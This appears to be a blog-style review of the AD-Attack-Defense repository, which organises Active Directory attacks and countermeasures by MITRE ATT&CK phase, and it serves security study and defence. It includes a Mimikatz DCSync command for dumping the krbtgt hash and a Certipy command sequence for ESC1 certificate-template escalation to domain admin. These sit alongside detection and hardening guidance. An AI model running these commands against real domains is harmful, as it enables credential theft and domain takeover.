AD-Attack-Defense: The MITRE ATT&CK Navigation System for Active Directory Security
Hook
Over 70% of enterprise breaches involve Active Directory compromise, yet most organizations lack a structured framework for understanding both sides of the AD security equation—attackers exploit this asymmetry daily.
Context
Active Directory remains the backbone of enterprise identity infrastructure, powering authentication and authorization for organizations worldwide. Despite decades of maturity, AD continues to be the crown jewel target for adversaries because compromising it means game over—total domain control, lateral movement capabilities, and persistent access across the entire network. The security community produces excellent research on both offensive techniques and defensive controls, but this knowledge exists scattered across blog posts, conference presentations, GitHub repositories, and vendor documentation.
The AD-Attack-Defense repository emerged to solve this discoverability problem. Rather than force practitioners to rebuild their mental maps of AD security from fragmented sources, infosecn1nja created a centralized navigation system that organizes attack vectors and countermeasures by MITRE ATT&CK framework phases. Think of it as a well-curated security operations center (SOC) playbook meets a penetration tester's field manual—a structured knowledge base that helps both defenders prioritize hardening efforts and attackers understand the full spectrum of post-exploitation tradecraft. With nearly 5,000 GitHub stars, it's become a go-to reference that saves security teams from reinventing the reconnaissance wheel.
Technical Insight
The repository's architecture follows the MITRE ATT&CK Enterprise matrix, breaking down Active Directory attack chains into discrete tactical phases: Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, and Exfiltration. Each phase contains a curated collection of attack techniques paired with detection strategies and mitigation controls, creating bidirectional visibility.
Take the Credential Access phase as a concrete example. The repository documents techniques like DCSync attacks, where adversaries abuse legitimate domain replication protocols to extract password hashes. A typical DCSync attack uses Mimikatz to impersonate a domain controller:
# Attacker perspective: DCSync to extract krbtgt hash
mimikatz # lsadump::dcsync /domain:corporate.local /user:krbtgt
# This abuses DS-Replication-Get-Changes and
# DS-Replication-Get-Changes-All permissions
# Returns NTLM hash and Kerberos keys for the target account
The defensive counterpart immediately follows, linking to detection methods like monitoring Event ID 4662 (Directory Services Access) where the ObjectType matches specific replication GUIDs (1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 for DS-Replication-Get-Changes). It references Microsoft Advanced Threat Analytics rules, Sigma detection signatures, and Azure ATP alerts that trigger on non-DC computers requesting replication data.
The repository excels at covering emerging attack vectors that traditional AD security guidance misses. The ADCS (Active Directory Certificate Services) abuse section documents privilege escalation techniques discovered by SpecterOps researchers in 2021, including ESC1 through ESC8 exploitation paths. For instance, ESC1 exploits misconfigured certificate templates that allow SAN (Subject Alternative Name) specification:
# Find vulnerable certificate templates
Certipy find -u lowpriv@corporate.local -p Password123 -dc-ip 10.0.0.1
# Request certificate with DA SAN
Certipy req -u lowpriv@corporate.local -p Password123 \
-ca CORPORATE-DC-CA -template VulnerableTemplate \
-alt administrator@corporate.local
# Authenticate as DA using the certificate
Certipy auth -pfx administrator.pfx -dc-ip 10.0.0.1
The linked defensive guidance explains how to audit certificate template permissions using tools like PSPKIAudit, configure templates to require manager approval, and enable certificate transparency logging. This attack-defense pairing helps blue teams understand why specific hardening controls matter by showing the exact exploit they prevent.
Another architectural strength is the repository's treatment of Kerberos attacks beyond simple Kerberoasting. It documents advanced techniques like Bronze Bit attacks (CVE-2020-17049), which abuse the Kerberos S4U2Proxy protocol by flipping the Forwardable flag in service tickets after validation. The repository links to both Benjamin Delpy's technical analysis and Microsoft's patch guidance, while noting that detecting these attacks requires analyzing ticket anomalies rather than relying solely on signature-based detection.
The Discovery phase documentation demonstrates practical enumeration workflows that map to real-world assessment methodologies. It progresses from passive techniques (analyzing DNS records, LDAP queries without authentication) through authenticated enumeration (using PowerView, BloodHound, ADRecon) to detection engineering guidance. For defenders, it explains which telemetry sources catch each enumeration technique—LDAP query logging for directory harvesting, Zeek/Suricata signatures for SMB enumeration, and Windows Event 4662 for reconnaissance via LDAP.
What makes this repository particularly valuable for security architects is how it connects atomic techniques into kill chains. The Lateral Movement section doesn't just list individual methods like PsExec or DCOM execution—it explains how attackers chain credential theft (Mimikatz) with privilege escalation (token manipulation) and remote execution (WMI) to move laterally while evading detection. This systems thinking helps defenders understand that blocking a single technique rarely stops determined adversaries; defense-in-depth requires addressing multiple control points across the attack chain.
Gotcha
The repository's primary limitation stems from its core design choice: being a link aggregator rather than self-contained documentation. When external sources become unavailable (link rot), techniques effectively disappear from your reference library. You'll find dozens of dead links or paywalled content, particularly for older vulnerabilities. During incident response at 2 AM, clicking through to a 404 page when you need immediate guidance on detecting PrintNightmare exploitation feels like a critical failure.
The lack of environmental context creates another practical problem. The repository presents techniques as equally weighted—there's no prioritization framework to help you decide whether sAMAccountName spoofing or Zerologon poses a greater risk to your specific AD environment. A domain running Windows Server 2012 R2 domain controllers with legacy GPO configurations faces different threats than a fully patched 2022 environment with Credential Guard and LAPS deployed. Without tooling to filter techniques by your patch level, AD functional level, or deployed controls, you'll waste time hardening against exploits that don't apply while missing relevant threats. The repository also doesn't include hands-on lab exercises or test environments, meaning you can't validate detection rules or practice defensive techniques without building your own infrastructure from scratch.
Verdict
Use if you're an intermediate-to-advanced security practitioner building an Active Directory threat model, planning penetration tests, or developing detection engineering playbooks. This repository excels as a structured jumping-off point that saves hours of research by organizing community knowledge into logical attack chains, particularly valuable for red teams designing realistic adversary emulation scenarios and blue teams prioritizing defensive investments against modern AD threats. Skip if you need ready-to-run tools, self-contained step-by-step tutorials, or beginner-friendly explanations—the link-heavy format assumes you can independently evaluate and adapt external research. Also skip if you require up-to-date, always-available documentation during incident response; invest in commercial threat intelligence platforms or self-hosted knowledge bases instead.
